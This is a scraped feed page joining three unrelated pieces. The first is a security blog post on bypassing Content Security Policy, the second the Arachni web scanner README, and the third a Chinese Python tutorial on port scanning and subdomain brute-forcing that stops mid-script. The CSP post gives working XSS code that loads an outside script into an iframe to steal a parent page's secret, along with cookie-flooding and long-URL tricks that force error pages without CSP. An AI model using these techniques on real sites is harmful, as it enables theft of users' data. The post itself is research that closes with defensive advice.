How to trick CSP in letting you run whatever you want

By bo0om, Wallarm research

Content Security Policy or CSP is a built-in browser technology which helps protect from attacks such as cross-site scripting (XSS). It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascripts and more.

But what if we can give an example of successful XSS event when no unsafe resource origins are allowed? Read on to find out how.

How CSP works when everything is well.

A common usage scenario here is when CSP specifies that the images can only be loaded from the current domain, which means that all the tags with external domains will be ignored.

CSP policy is commonly used to block untrusted JS and minimize the change of a successful XSS exploit.

Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line:

Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;

Since a security policy implies “prohibited unless explicitly allowed”, this configuration prohibits usage of any functions that execute code transmitted as a string. For example: eval, setTimeout, setInterval will all be blocked because of the setting unsafe-eval

Any content from external sources is also blocked, including images, css, websockets, and, especially, JS

To see for yourself how it works, check out this code where I deliberately put in a XSS exploit. Try to steal the secret this way without spooking the user, i.e. without a redirect.

Tricking CSP

Despite the limitations, we can still upload scenarios, create frames and put together images because self does not prevent working with the resources governed by Self Origin Policy (SOP). Since CSP also applies to frames, the same policy governs frames that may include data, blob or files formed with srcdoc as protocols.

So, can we really execute an arbitrary javascript in a test file? The truth is out there.

We are going to rely on a neat tick here. Most of the modern browser automatically convert files, such as text files or images, to an HTML page.

The reason for this behavior is to correctly depict the content in the browser window; it needs to have the right background, be centered and so on. However, iframe is also a browser window!. Thus, opening any file that needs to shown in a browser in an iframe (i.e. favicon.ico or robots.txt) will immediately convert them into HTML without any data validation as long as the content-type is right.

What happens if a frame opens a site page that doesn’t have a CSP header? You can guess the answer. Without CSP, an open frame will execute all the JS inside the page. If the page has an XSS exploit, we can write a js into the frame ourselves.

To test this, let’s try a scenario which opens an iframe. Let’s use bootstrap.min.css, which we already mentioned earlier, as an example.

frame=document.createElement(“iframe”);
frame.src=”/css/bootstrap.min.css”;
document.body.appendChild(frame);

Let’s take a look at what’s in the frame. As expected, CSS got converted into HTML and we managed to overwrite the content of head (even though it was empty to begin with). Now, let’s see if we can get it to suck in an external JS file.

script=document.createElement(‘script’);
script.src=’//bo0om.ru/csp.js’;
window.frames[0].document.head.appendChild(script);

It worked! this is how we can execute an injecting through an iframe, create our own js scenario and query the parent window to steal its data.

All you need for an XSS exploit is to open an iframe and pointed it at any path that doesn’t include a CSP header. It can be the standard favicon.ico, robots.txt, sitemap.xml, css/js, jpg or other files.

PoC

Slight of hand and no magic

What if the site developer was careful and any expected site response (200-OK) includes X-Frame-Options: Deny? We can still try to get in. The second common error in using CSP is a lack of protective headers when returning web scanner errors. The simplest way to try this is to try to open a web page that doesn’t exist. I noticed that many resources only include X-Frame-Options on response with 200 code and not with 404 code.

If that is also accounted for, we can try causing the site to return a standard web-server “invalid request” message.

For example, force NGINX to return “400 bad request”, all you need to do is to query on level above it at /../ To prevent the browser from normalizing the request and replacing /../ with /, we will use unicode for the dots and the last slash.

frame=document.createElement(“iframe”);
frame.src=”/%2e%2e%2f”;
document.body.appendChild(frame);

Another possibility here is passing and incorrect unicode path, i.e. /% or /%%z

However, the easiest way to get a web-server to return an error is to exceed the URL allowed length. Most modern browsers can concoct a url which is much much longer than a web-server can handle. A standard default url length handled by such web-servers and NGINX & Apache is set not to exceed 8kB.

To try that, we can execute a similar scenario with a path length of 20000 byte:

frame=document.createElement(“iframe”);
frame.src=”/”+”A”.repeat(20000);
document.body.appendChild(frame);

Yet another way to fool the server into returning an error is to trigger a cookie length limit. Again, browsers support more and longer cookies than web-servers can handle. Following the same scenario:

  1. Create a humongous cookie
    for(var i=0;i<5;i++){document.cookie=i+”=”+”a”.repeat(4000)};

2. Open an iframe using any address, which will cause the server to return an error (often without XFO or CSP)

3. Remove the humongous cookie:
for(var i=0;i<5;i++){document.cookie=i+”=”}

4. Write your own js script into the frame that steals the parent’s secret

Try it for yourself. Here are some hints for you if you need them: PoC :)

There many other ways to cause the web-server to return an error, for example we can send a POST request which is too long or cause the web-server 500 error somehow.

Why is CSP so gullible and what to do about it?

The simple underlying reason is that the policy controlling the resource is embedded within the resource itself.

To avoid the bad situations, my recommendations are:

  • CSP headers should be present on all the pages, event on the error pages returned by the web-server.
  • CSP options should be configured to restrict the rights to just those necessary to work with the specific resource. Try setting Content-Security-Policy-Report-Only: default-src ‘none’ and gradually adding permission rules for specific use cases.

If you have to use unsafe-inline for correctly loading and processing the resources, your only protection is to use nonce or hash-source. Otherwise, you are exposed to XSS exploits and if CSP doesn’t protect, why do you need it in the first place ?!

Additionally, as shared by @majorisc, another trick for stealing the data from a page is to use RTCPeerConnection and to pass the secret via DNS requests. default-src ‘self’ doesn’t protect from it, unfortunately.

Keep reading our blog for more tricks from our magic bag.


          GitHub - Arachni/arachni: Web Application Security Scanner Framework      Cache   Translate Page   Web Page Cache   

README.md

Arachni logo

Synopsis

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.

Arachni offers:

A stable, efficient, high-performance framework

Check, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.

Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.

Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.

Simplicity

Although some parts of the Framework are fairly complex you will never have to deal them directly. From a user’s or a component developer’s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility.

From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.

In simple terms

Arachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.

Features

General

  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support with fine-grained options.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).
  • Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).
  • Custom 404 page detection.
  • UI abstraction:
  • Pause/resume functionality.
  • Hibernation support -- Suspend to and restore from disk.
  • High performance asynchronous HTTP requests.
    • With adjustable concurrency.
    • With the ability to auto-detect server health and adjust its concurrency automatically.
  • Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.

Integrated browser environment

Arachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.

In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest:

In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.

Relevant information include:

  • Page DOM, as HTML code.
    • With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.
  • Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.
    • With a list of DOM transitions.
  • Data-flow sinks -- Each sink is a JS method which received a tainted argument.
    • Parent object of the method (ex.: DOMWindow).
    • Method signature (ex.: decodeURIComponent()).
    • Arguments list.
      • With the identified taint located recursively in the included objects.
    • Method source code.
    • JS stacktrace.
  • Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks.
    • Includes a JS stacktrace.
  • JavaScript stack-traces include:
    • Method names.
    • Method locations.
    • Method source codes.
    • Argument lists.

In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.

Browser-cluster

The browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.

Configuration options include:

  • Adjustable pool-size, i.e. the amount of browser workers to utilize.
  • Timeout for each job.
  • Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned.
  • Ability to disable loading images.
  • Adjustable screen width and height.
    • Can be used to analyze responsive and mobile applications.
  • Ability to wait until certain elements appear in the page.
  • Configurable local storage data.

Coverage

The system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.

In addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programatically in order to provide coverage for a full set of possible scenarios.

By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:

  • Forms
    • Along with ones that require interaction via a real browser due to DOM events.
  • User-interface Forms
    • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
  • User-interface Inputs
    • Orphan <input> elements with associated DOM events.
  • Links
    • Along with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2
    • With support for rewrite rules.
  • LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available.
    • Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2
  • Cookies
  • Headers
  • Generic client-side elements which have associated DOM events.
  • AJAX-request parameters.
  • JSON request data.
  • XML request data.

Open distributed architecture

Arachni is designed to fit into your workflow and easily integrate with your existing infrastructure.

Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.

Both approaches allow you to:

  • Remotely monitor and manage scans.
  • Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of:
    • Multi-core/SMP architectures.
    • OS-level scheduling/restrictions.
    • Sandboxed failure propagation.
  • Communicate over a secure channel.

REST API

  • Very simple and straightforward API.
  • Easy interoperability with non-Ruby systems.
    • Operates over HTTP.
    • Uses JSON to format messages.
  • Stateful scan monitoring.
    • Unique sessions automatically only receive updates when polling for progress, rather than full data.

RPC API

  • High-performance/low-bandwidth communication protocol.
    • MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.
  • Grid:
    • Self-healing.
    • Scale up/down by hot-plugging/hot-unplugging nodes.
      • Can scale up infinitely by adding nodes to increase scan capacity.
    • (Always-on) Load-balancing -- All Instances are automatically provided by the least burdened Grid member.
      • With optional per-scan opt-out/override.
    • (Optional) High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans.
      • Enabled on a per-scan basis.

Scope configuration

  • Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.
    • Can optionally detect and ignore redundant pages automatically.
  • URL exclusion filters using regular expressions.
  • Page exclusion filters based on content, using regular expressions.
  • URL inclusion filters using regular expressions.
  • Can be forced to only follow HTTPS paths and not downgrade to HTTP.
  • Can optionally follow subdomains.
  • Adjustable page count limit.
  • Adjustable redirect limit.
  • Adjustable directory depth limit.
  • Adjustable DOM depth limit.
  • Adjustment using URL-rewrite rules.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope).

Audit

  • Can audit:
    • Forms
      • Can automatically refresh nonce tokens.
      • Can submit them via the integrated browser environment.
    • User-interface Forms
      • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
    • User-interface Inputs
      • Orphan <input> elements with associated DOM events.
    • Links
      • Can load them via the integrated browser environment.
    • LinkTemplates
      • Can load them via the integrated browser environment.
    • Cookies
      • Can load them via the integrated browser environment.
    • Headers
    • Generic client-side DOM elements.
    • JSON request data.
    • XML request data.
  • Can ignore binary/non-text pages.
  • Can audit elements using both GET and POST HTTP methods.
  • Can inject both raw and HTTP encoded payloads.
  • Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.
  • Can exclude specific input vectors by name.
  • Can include specific input vectors by name.

Components

Arachni is a highly modular system, employing several components of distinct types to perform its duties.

In addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.

Platform fingerprinters

In order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.

Currently, the following platforms can be identified:

  • Operating systems
    • BSD
    • Linux
    • Unix
    • Windows
    • Solaris
  • Web servers
    • Apache
    • IIS
    • Nginx
    • Tomcat
    • Jetty
    • Gunicorn
  • Programming languages
    • PHP
    • ASP
    • ASPX
    • Java
    • Python
    • Ruby
  • Frameworks
    • Rack
    • CakePHP
    • Rails
    • Django
    • ASP.NET MVC
    • JSF
    • CherryPy
    • Nette
    • Symfony

The user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.

Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.

Checks

Checks are system components which perform security checks and log issues.

Active

Active checks engage the web application via its inputs.

  • SQL injection (sql_injection) -- Error based detection.
    • Oracle
    • InterBase
    • PostgreSQL
    • MySQL
    • MSSQL
    • EMC
    • SQLite
    • DB2
    • Informix
    • Firebird
    • SaP Max DB
    • Sybase
    • Frontbase
    • Ingres
    • HSQLDB
    • MS Access
  • Blind SQL injection using differential analysis (sql_injection_differential).
  • Blind SQL injection using timing attacks (sql_injection_timing).
    • MySQL
    • PostgreSQL
    • MSSQL
  • NoSQL injection (no_sql_injection) -- Error based vulnerability detection.
  • Blind NoSQL injection using differential analysis (no_sql_injection_differential).
  • CSRF detection (csrf).
  • Code injection (code_injection).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • Blind code injection using timing attacks (code_injection_timing).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • LDAP injection (ldap_injection).
  • Path traversal (path_traversal).
    • *nix
    • Windows
    • Java
  • File inclusion (file_inclusion).
    • *nix
    • Windows
    • Java
    • PHP
    • Perl
  • Response splitting (response_splitting).
  • OS command injection (os_cmd_injection).
    • *nix
    • *BSD
    • IBM AIX
    • Windows
  • Blind OS command injection using timing attacks (os_cmd_injection_timing).
    • Linux
    • *BSD
    • Solaris
    • Windows
  • Remote file inclusion (rfi).
  • Unvalidated redirects (unvalidated_redirect).
  • Unvalidated DOM redirects (unvalidated_redirect_dom).
  • XPath injection (xpath_injection).
    • Generic
    • PHP
    • Java
    • dotNET
    • libXML2
  • XSS (xss).
  • Path XSS (xss_path).
  • XSS in event attributes of HTML elements (xss_event).
  • XSS in HTML tags (xss_tag).
  • XSS in script context (xss_script_context).
  • DOM XSS (xss_dom).
  • DOM XSS script context (xss_dom_script_context).
  • Source code disclosure (source_code_disclosure)
  • XML External Entity (xxe).
    • Linux
    • *BSD
    • Solaris
    • Windows
Passive

Passive checks look for the existence of files, folders and signatures.

  • Allowed HTTP methods (allowed_methods).
  • Back-up files (backup_files).
  • Backup directories (backup_directories)
  • Common administration interfaces (common_admin_interfaces).
  • Common directories (common_directories).
  • Common files (common_files).
  • HTTP PUT (http_put).
  • Insufficient Transport Layer Protection for password forms (unencrypted_password_form).
  • WebDAV detection (webdav).
  • HTTP TRACE detection (xst).
  • Credit Card number disclosure (credit_card).
  • CVS/SVN user disclosure (cvs_svn_users).
  • Private IP address disclosure (private_ip).
  • Common backdoors (backdoors).
  • .htaccess LIMIT misconfiguration (htaccess_limit).
  • Interesting responses (interesting_responses).
  • HTML object grepper (html_objects).
  • E-mail address disclosure (emails).
  • US Social Security Number disclosure (ssn).
  • Forceful directory listing (directory_listing).
  • Mixed Resource/Scripting (mixed_resource).
  • Insecure cookies (insecure_cookies).
  • HttpOnly cookies (http_only_cookies).
  • Auto-complete for password form fields (password_autocomplete).
  • Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass)
  • Form-based upload (form_upload)
  • localstart.asp (localstart_asp)
  • Cookie set for parent domain (cookie_set_for_parent_domain)
  • Missing Strict-Transport-Security headers for HTTPS sites (hsts).
  • Missing X-Frame-Options headers (x_frame_options).
  • Insecure CORS policy (insecure_cors_policy).
  • Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access)
  • Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Insecure client-access policy (insecure_client_access_policy)

Reporters

Plugins

Plugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality.

  • Passive Proxy (proxy) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
  • Form based login (autologin).
  • Script based login (login_script).
  • Dictionary attacker for HTTP Auth (http_dicattack).
  • Dictionary attacker for form based authentication (form_dicattack).
  • Cookie collector (cookie_collector) -- Keeps track of cookies while establishing a timeline of changes.
  • WAF (Web Application Firewall) Detector (waf_detector) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.
  • BeepNotify (beep_notify) -- Beeps when the scan finishes.
  • EmailNotify (email_notify) -- Sends a notification (and optionally a report) over SMTP at the end of the scan.
  • VectorFeed (vector_feed) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.
  • Script (script) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.
  • Uncommon headers (uncommon_headers) -- Logs uncommon headers.
  • Content-types (content_types) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.
  • Vector collector (vector_collector) -- Collects information about all seen input vectors which are within the scan scope.
  • Headers collector (headers_collector) -- Collects response headers based on specified criteria.
  • Exec (exec) -- Calls external executables at different scan stages.
  • Metrics (metrics) -- Captures metrics about multiple aspects of the scan and the web application.
  • Restrict to DOM state (restrict_to_dom_state) -- Restricts the audit to a single page's DOM state, based on a URL fragment.
  • Webhook notify (webhook_notify) -- Sends a webhook payload over HTTP at the end of the scan.
  • Rate limiter (rate_limiter) -- Rate limits HTTP requests.
  • Page dump (page_dump) -- Dumps page data to disk as YAML.
Defaults

Default plugins will run for every scan and are placed under /plugins/defaults/.

  • AutoThrottle (autothrottle) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • Healthmap (healthmap) -- Generates sitemap showing the health of each crawled/audited URL
Meta

Plugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.

  • TimingAttacks (timing_attacks) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
  • Discovery (discovery) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.
  • Uniformity (uniformity) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.

Trainer subsystem

The Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.

Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.

However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.

Still, this can be an invaluable asset to Fuzzer checks.

Running the specs

You can run rake spec to run all specs or you can run them selectively using the following:

rake spec:core            # for the core libraries
rake spec:checks          # for the checks
rake spec:plugins         # for the plugins
rake spec:reports         # for the reports
rake spec:path_extractors # for the path extractors

Please be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.

Note: The check specs will take many hours to complete due to the timing-attack tests.

Bug reports/Feature requests

Submit bugs using GitHub Issues and get support via the Support Portal.

Contributing

(Before starting any work, please read the instructions for working with the source code.)

We're happy to accept help from fellow code-monkeys and these are the steps you need to follow in order to contribute code:

  • Fork the project.
  • Start a feature branch based on the experimental branch (git checkout -b <feature-name> experimental).
  • Add specs for your code.
  • Run the spec suite to make sure you didn't break anything (rake spec:core for the core libs or rake spec for everything).
  • Commit and push your changes.
  • Issue a pull request and wait for your code to be reviewed.

License

Arachni Public Source License v1.0 -- please see the LICENSE file for more information.


          Python大法之告别脚本小子系列---信息资产收集类脚本编写(上)      Cache   Translate Page   Web Page Cache   
本文原创作者:阿甫哥哥,本文属i春秋原创奖励计划,未经许可禁止转载
image
0x01 前言
在采集到URL之后,要做的就是对目标进行信息资产收集了,收集的越好,你挖到洞也就越多了............当然这一切的前提,就是要有耐心了!!!由于要写工具较多,SO,我会分两部分写......
0x02 端口扫描脚本编写

image
端口扫描的原理:
端口扫描,顾名思义,就是逐个对一段端口或指定的端口进行扫描。通过扫描结果可以知道一台计算机上都提供了哪些服务,然后就可以通过所提供的这些服务的己知漏洞就可进行攻击。其原理是当一个主机向远端一个服务器的某一个端口提出建立一个连接的请求,如果对方有此项服务,就会应答,如果对方未安装此项服务时,即使你向相应的端口发出请求,对方仍无应答,利用这个原理,如果对所有熟知端口或自己选定的某个范围内的熟知端口分别建立连接,并记录下远端服务器所给予的应答,通过查看一记录就可以知道目标服务器上都安装了哪些服务,这就是端口扫描,通过端口扫描,就可以搜集到很多关于目标主机的各种很有参考价值的信息。例如,对方是否提供FPT服务、WWW服务或其它服务。

代理服务器还有很多常用的端口
比如HTTP协议常用的就是:80/8080/3128/8081/9080,FTP协议常用的就是:21,Telnet协议常用的是23等等
来个较全的...
[AppleScript] 纯文本查看 复制代码
代理服务器常用以下端口:
⑴. HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
⑵. SOCKS代理协议服务器常用端口号:1080
⑶. FTP(文件传输)协议代理服务器常用端口号:21
⑷. Telnet(远程登录)协议代理服务器常用端口:23
HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
FTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080;
WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB(XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp
等等,更具体的去百度吧,啊哈哈

端口的三种状态
OPEN  --端口是开放的,可以访问,有进程
CLOSED  --端口不会返回任何东西..可能有waf
FILTERED  --可以访问,但是没有程序监听

这里用一个工具--nmap举下栗子吧...
[AppleScript] 纯文本查看 复制代码
C:\Users\Administrator>nmap -sV localhost
Starting Nmap 7.70 ( [url]https://nmap.org[/url] ) at 2018-07-03 17:10 ?D1ú±ê×?ê±??
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00053s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 990 closed ports
PORT      STATE SERVICE           VERSION
80/tcp    open  http              Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp   open  msrpc             Microsoft Windows RPC
443/tcp   open  ssl/https         VMware Workstation SOAP API 14.1.1
445/tcp   open  microsoft-ds      Microsoft Windows 7 - 10 microsoft-ds (workgroup: WorkGroup)
903/tcp   open  ssl/vmware-auth   VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
1080/tcp  open  http-proxy        Polipo
3306/tcp  open  mysql             MySQL 5.5.53
8088/tcp  open  radan-http?
10000/tcp open  snet-sensor-mgmt?
65000/tcp open  tcpwrapped

说的差不多了,咱们开始用Python实现它....端口扫描在Python中可以用的模块有很多,本文用socket模块演示单线程的在之前的文章有说过,具体传送门:
一个精壮的代购骗子被我彻底征服
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import socket
 
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip):
    result_list=list()
    port_list=range(1,65535)
    for port in port_list:
        try:
            s=socket.socket() 
            s.settimeout(0.1)
            s.connect((ip,port))
            openstr= " PORT:"+str(port) +" OPEN "
            print openstr
            result_list.append(port)
            s.close()
        except:
            pass
    print result_list
def main():
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print 'IP:'+ip
    PortScan(ip)
if __name__=='__main__':  
    main()

速度是不是巨慢,既然是告别脚本小子,写个单线程的。。肯定是不行的,啊哈哈
放出多线程版本
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import socket
import threading

lock = threading.Lock()
threads = []
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '[-]%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip,port):
    try:
        s=socket.socket() 
        s.settimeout(0.1)
        s.connect((ip,port))
        lock.acquire()
        openstr= "[-] PORT:"+str(port) +" OPEN "
        print openstr
        lock.release()
        s.close()
    except:
        pass
def main():
    banner = '''
                      _                       
     _ __   ___  _ __| |_ ___  ___ __ _ _ __  
    | '_ \ / _ \| '__| __/ __|/ __/ _` | '_ \ 
    | |_) | (_) | |  | |_\__ \ (_| (_| | | | |
    | .__/ \___/|_|   \__|___/\___\__,_|_| |_|
    |_|                                       

            '''
    print banner
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print '[-] IP:'+ip
    for n in range(1,76):
        for p in range((n-1)*880,n*880):
            t = threading.Thread(target=PortScan,args=(ip,p))
            threads.append(t)
            t.start()     

        for t in threads:
            t.join()
    print ' This scan completed !'
if __name__=='__main__':  
    main()
image
很简单的,我都不知道该怎么讲。。。如果你基础知识还不够牢固,请移步至初级篇
Python大法从入门到编写POC
0x03 子域名采集脚本编写
image
采集子域名可以在测试范围内发现更多的域或子域,这将增大漏洞发现的几率。采集的方法也有很多方法,本文就不再过多的叙述了,采集方法的方法可以参考这篇文章
子域名搜集思路与技巧梳理
其实lijiejie大佬的subdomainbrute就够用了.....当然了,i春秋也有视频教程的。。。
Python安全工具开发应用
本文就演示三种吧
第一种是通过字典爆破,这个方法主要靠的是字典了....采集的多少取决于字典的大小了...
演示个单线程的吧
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import requests
import re
import sys

def writtarget(target):
        print target
        file = open('result.txt','a')
        with file as f:
                f.write(target+'\n')

        file.close()


def targetopen(httptarget , httpstarget):


        header = {
                        'Connection': 'keep-alive',
                        'Pragma': 'no-cache',
                        'Cache-Control': 'no-cache',
                        'Upgrade-Insecure-Requests': '1',
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                        'DNT': '1',
                        'Accept-Encoding': 'gzip, deflate',
                        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                }

        try:
                reponse_http = requests.get(httptarget, timeout=3, headers=header)
                code_http = reponse_http.status_code


                if (code_http == 200):
                        httptarget_result = re.findall('//.*', httptarget)

                        writtarget(httptarget_result[0][2:])

                else:
                        reponse_https = requests.get(httpstarget, timeout=3, headers=header)
                        code_https = reponse_https.status_code
                        if (code_https == 200):
                                httpstarget_result = re.findall('//.*', httpstarget)

                                writtarget(httpstarget_result[0][2:])


        except:
                pass

def domainscan(target):

        f = open('domain.txt','r')
        for line in f:
                httptarget_result = 'http://'+ line.strip() + '.'+target
                httpstarget_result = 'https://'+ line.strip() + '.'+target

                targetopen(httptarget_result, httpstarget_result)

        f.close()

if __name__ == "__main__":
        print ' ____                        _       ____             _       '
        print '|  _ \  ___  _ __ ___   __ _(_)_ __ | __ ) _ __ _   _| |_ ___ '
        print "| | | |/ _ \| '_ ` _ \ / _` | | '_ \|  _ \| '__| | | | __/ _ \  "
        print "| |_| | (_) | | | | | | (_| | | | | | |_) | |  | |_| | ||  __/"
        print '|____/ \___/|_| |_| |_|\__,_|_|_| |_|____/|_|   \__,_|\__\___|'
                                                              


        file = open('result.txt','w+')
        file.truncate()
        file.close()
        target = raw_input('PLEASE INPUT YOUR DOMAIN(Eg:ichunqiu.com):')
        print 'Starting.........'
        domainscan(target)
        print 'Done ! Results in result.txt'

image
第二种是通过搜索引擎采集子域名,不过有些子域名不会收录在搜索引擎中.....

参考这篇文章
工具| 手把手教你信息收集之子域名收集器
我觉得这篇文章介绍的还可以的....我也懒得写了,直接贴过来吧

[Python] 纯文本查看 复制代码
#-*-coding:utf-8-*-
import requests
import re
key="qq.com"
sites=[]
match='style="text-decoration:none;">(.*?)/'
for i in range(48):
   i=i*10
